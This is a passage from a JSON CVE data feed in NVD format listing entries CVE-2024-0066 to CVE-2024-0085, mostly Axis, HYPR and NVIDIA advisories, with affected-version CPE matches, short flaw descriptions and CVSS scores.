"cpe:2.3:o:microsoft:windows_10_22h2:-:*:*:*:*:*:x86:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_11_21h2:-:*:*:*:*:*:arm64:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_11_21h2:-:*:*:*:*:*:x64:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_11_22h2:-:*:*:*:*:*:x64:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_11_22h2:-:*:*:*:*:*:arm64:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_server_2022_23h2:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:microsoft:.net_framework:3.5:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:microsoft:.net_framework:4.7.2:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_10_1607:-:*:*:*:*:*:x64:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_10_1607:-:*:*:*:*:*:x86:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_10_1809:-:*:*:*:*:*:x64:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_10_1809:-:*:*:*:*:*:arm64:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_10_1809:-:*:*:*:*:*:x86:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:microsoft:.net_framework:2.0:sp2:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:microsoft:.net_framework:3.0:sp2:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x64:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:x86:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:microsoft:.net:*:*:*:*:*:*:*:*", "versionStartIncluding" : "7.0.0", "versionEndExcluding" : "7.0.15", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:microsoft:.net:*:*:*:*:*:*:*:*", "versionStartIncluding" : "6.0.0", "versionEndExcluding" : "6.0.26", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:microsoft:.net:8.0.0:-:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-09T18:15Z", "lastModifiedDate" : "2024-11-21T08:45Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0066", "ASSIGNER" : "product-security@axis.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.axis.com/dam/public/03/49/2c/cve-2024-0066-en-US-442553.pdf", "name" : "https://www.axis.com/dam/public/03/49/2c/cve-2024-0066-en-US-442553.pdf", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.axis.com/dam/public/03/49/2c/cve-2024-0066-en-US-442553.pdf", "name" : "https://www.axis.com/dam/public/03/49/2c/cve-2024-0066-en-US-442553.pdf", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Johan Fagerström, member of the AXIS OS Bug Bounty Program, has found that a O3C feature may expose sensitive traffic between the client (Axis device) and (O3C) server. If O3C is not being used this flaw does not apply. \nAxis has released patched AXIS OS versions for the highlighted flaw. Please refer to the Axis security advisory for more information and solution." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-06-18T06:15Z", "lastModifiedDate" : "2024-11-21T08:45Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0067", "ASSIGNER" : "product-security@axis.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.axis.com/dam/public/c7/d0/91/cve-2024-0067-en-US-448994.pdf", "name" : "https://www.axis.com/dam/public/c7/d0/91/cve-2024-0067-en-US-448994.pdf", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Marinus Pfund, member of the AXIS OS Bug Bounty Program, \nhas found the VAPIX API ledlimit.cgi was vulnerable for path traversal attacks allowing to list folder/file names on the local file system of the Axis device. \nAxis has released patched AXIS OS versions for the highlighted flaw. Please refer to the Axis security advisory for more information and solution." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-09-10T05:15Z", "lastModifiedDate" : "2024-11-08T09:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0068", "ASSIGNER" : "security@hypr.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.hypr.com/trust-center/security-advisories", "name" : "https://www.hypr.com/trust-center/security-advisories", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.hypr.com/trust-center/security-advisories", "name" : "https://www.hypr.com/trust-center/security-advisories", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Improper Link Resolution Before File Access ('Link Following') vulnerability in HYPR Workforce Access on MacOS allows File Manipulation.This issue affects Workforce Access: before 8.7.1.\n\n" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:hypr:workforce_access:*:*:*:*:*:*:*:*", "versionEndExcluding" : "8.7.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "NONE", "baseScore" : 7.1, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.2 } }, "publishedDate" : "2024-02-29T20:15Z", "lastModifiedDate" : "2025-03-04T12:25Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0069", "ASSIGNER" : "security@hypr.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Rejected reason: This CVE ID was unused by the CNA." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2023-11-28T00:15Z", "lastModifiedDate" : "2023-11-28T00:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0070", "ASSIGNER" : "security@hypr.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Rejected reason: This CVE ID was unused by the CNA." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2023-11-28T00:15Z", "lastModifiedDate" : "2023-11-28T00:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0071", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5520", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5520", "refsource" : "", "tags" : [ ] }, { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5520", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5520", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA GPU Display Driver for Windows contains a vulnerability in the user mode layer, where an unprivileged regular user can cause an out-of-bounds write. A successful exploit of this vulnerability may lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-03-27T22:15Z", "lastModifiedDate" : "2024-11-21T08:45Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0072", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://https://nvidia.custhelp.com/app/answers/detail/a_id/5517", "name" : "https://https://nvidia.custhelp.com/app/answers/detail/a_id/5517", "refsource" : "", "tags" : [ ] }, { "url" : "https://https://nvidia.custhelp.com/app/answers/detail/a_id/5517", "name" : "https://https://nvidia.custhelp.com/app/answers/detail/a_id/5517", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "\nNVIDIA CUDA toolkit for all platforms contains a vulnerability in cuobjdump and nvdisasm where an attacker may cause a crash by tricking a user into reading a malformed ELF file. A successful exploit of this vulnerability may lead to a partial denial of service.\n\n" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-04-05T18:15Z", "lastModifiedDate" : "2024-11-21T08:45Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0073", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5520", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5520", "refsource" : "", "tags" : [ ] }, { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5520", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5520", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel mode layer when the driver is performing an operation at a privilege level that is higher than the minimum level required. A successful exploit of this vulnerability may lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-03-27T22:15Z", "lastModifiedDate" : "2024-11-21T08:45Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0074", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5520", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5520", "refsource" : "", "tags" : [ ] }, { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5520", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5520", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA GPU Display Driver for Linux contains a vulnerability where an attacker may access a memory location after the end of the buffer. A successful exploit of this vulnerability may lead to denial of service and data tampering." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-03-27T22:15Z", "lastModifiedDate" : "2024-11-21T08:45Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0075", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5520", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5520", "refsource" : "", "tags" : [ ] }, { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5520", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5520", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability where a user may cause a NULL-pointer dereference by accessing passed parameters the validity of which has not been checked. A successful exploit of this vulnerability may lead to denial of service and limited information disclosure." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-03-27T22:15Z", "lastModifiedDate" : "2024-11-21T08:45Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0076", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5517", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5517", "refsource" : "", "tags" : [ ] }, { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5517", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5517", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "\nNVIDIA CUDA toolkit for all platforms contains a vulnerability in cuobjdump and nvdisasm where an attacker may cause a crash by tricking a user into reading a malformed ELF file. A successful exploit of this vulnerability may lead to a partial denial of service.\n\n" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-04-05T18:15Z", "lastModifiedDate" : "2024-11-21T08:45Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0077", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5520", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5520", "refsource" : "", "tags" : [ ] }, { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5520", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5520", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA Virtual GPU Manager contains a vulnerability in the vGPU plugin, where it allows a guest OS to allocate resources for which the guest OS is not authorized. A successful exploit of this vulnerability may lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-03-27T22:15Z", "lastModifiedDate" : "2024-11-21T08:45Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0078", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5520", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5520", "refsource" : "", "tags" : [ ] }, { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5520", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5520", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer, where a user in a guest can cause a NULL-pointer dereference in the host, which may lead to denial of service." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-03-27T22:15Z", "lastModifiedDate" : "2024-11-21T08:45Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0079", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5520", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5520", "refsource" : "", "tags" : [ ] }, { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5520", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5520", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer, where a user in a guest VM can cause a NULL-pointer dereference in the host. A successful exploit of this vulnerability may lead to denial of service." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-03-27T22:15Z", "lastModifiedDate" : "2024-11-21T08:45Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0080", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://https://nvidia.custhelp.com/app/answers/detail/a_id/5517", "name" : "https://https://nvidia.custhelp.com/app/answers/detail/a_id/5517", "refsource" : "", "tags" : [ ] }, { "url" : "https://https://nvidia.custhelp.com/app/answers/detail/a_id/5517", "name" : "https://https://nvidia.custhelp.com/app/answers/detail/a_id/5517", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "\nNVIDIA nvTIFF Library for Windows and Linux contains a vulnerability where improper input validation might enable an attacker to use a specially crafted input file. A successful exploit of this vulnerability might lead to a partial denial of service.\n\n" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-04-05T18:15Z", "lastModifiedDate" : "2024-11-21T08:45Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0081", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/NVIDIA/NeMo/security/advisories/GHSA-x392-p65g-4rxx", "name" : "https://github.com/NVIDIA/NeMo/security/advisories/GHSA-x392-p65g-4rxx", "refsource" : "", "tags" : [ ] }, { "url" : "https://github.com/NVIDIA/NeMo/security/advisories/GHSA-x392-p65g-4rxx", "name" : "https://github.com/NVIDIA/NeMo/security/advisories/GHSA-x392-p65g-4rxx", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "\nNVIDIA NeMo framework for Ubuntu contains a vulnerability in tools/asr_webapp where an attacker may cause an allocation of resources without limits or throttling. A successful exploit of this vulnerability may lead to a server-side denial of service.\n\n" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-04-05T19:15Z", "lastModifiedDate" : "2024-11-21T08:45Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0082", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5532", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5532", "refsource" : "", "tags" : [ ] }, { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5532", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5532", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA ChatRTX for Windows contains a vulnerability in the UI, where an attacker can cause improper privilege management by sending open file requests to the application. A successful exploit of this vulnerability might lead to local escalation of privileges, information disclosure, and data tampering" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-04-08T22:15Z", "lastModifiedDate" : "2024-11-21T08:45Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0083", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" }, { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5532", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5532", "refsource" : "", "tags" : [ ] }, { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5532", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5532", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA ChatRTX for Windows contains a vulnerability in the UI, where an attacker can cause a cross-site scripting error by network by running malicious scripts in users' browsers. A successful exploit of this vulnerability might lead to code execution, denial of service, and information disclosure." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-04-08T22:15Z", "lastModifiedDate" : "2025-02-26T19:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0084", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-Other" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5551", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5551", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5551", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5551", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA vGPU software for Linux contains a vulnerability in the Virtual GPU Manager, where the guest OS could execute privileged operations. A successful exploit of this vulnerability might lead to information disclosure, data tampering, escalation of privileges, and denial of service." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:virtual_gpu:*:*:*:*:*:*:*:*", "versionEndExcluding" : "13.11", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:virtual_gpu:*:*:*:*:*:*:*:*", "versionStartIncluding" : "14.0", "versionEndExcluding" : "16.6", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:virtual_gpu:*:*:*:*:*:*:*:*", "versionStartIncluding" : "17.0", "versionEndExcluding" : "17.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:canonical:ubuntu_linux:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:citrix:hypervisor:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux_kernel-based_virtual_machine:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:vmware:vsphere:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:cloud_gaming:*:*:*:*:*:*:*:*", "versionEndExcluding" : "555.52.04", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux_kernel-based_virtual_machine:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:vmware:vsphere:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-06-13T22:15Z", "lastModifiedDate" : "2024-11-21T08:45Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0085", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-Other" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5551", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5551", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5551", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5551", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA vGPU software for Windows and Linux contains a vulnerability where unprivileged users could execute privileged operations on the host. A successful exploit of this vulnerability might lead to data tampering, escalation of privileges, and denial of service." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:virtual_gpu:*:*:*:*:*:*:*:*", "versionEndExcluding" : "13.11", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:virtual_gpu:*:*:*:*:*:*:*:*", "versionStartIncluding" : "14.0", "versionEndExcluding" : "16.6", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:virtual_gpu:*:*:*:*:*:*:*:*", "versionStartIncluding" : "17.0", "versionEndExcluding" : "17.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], 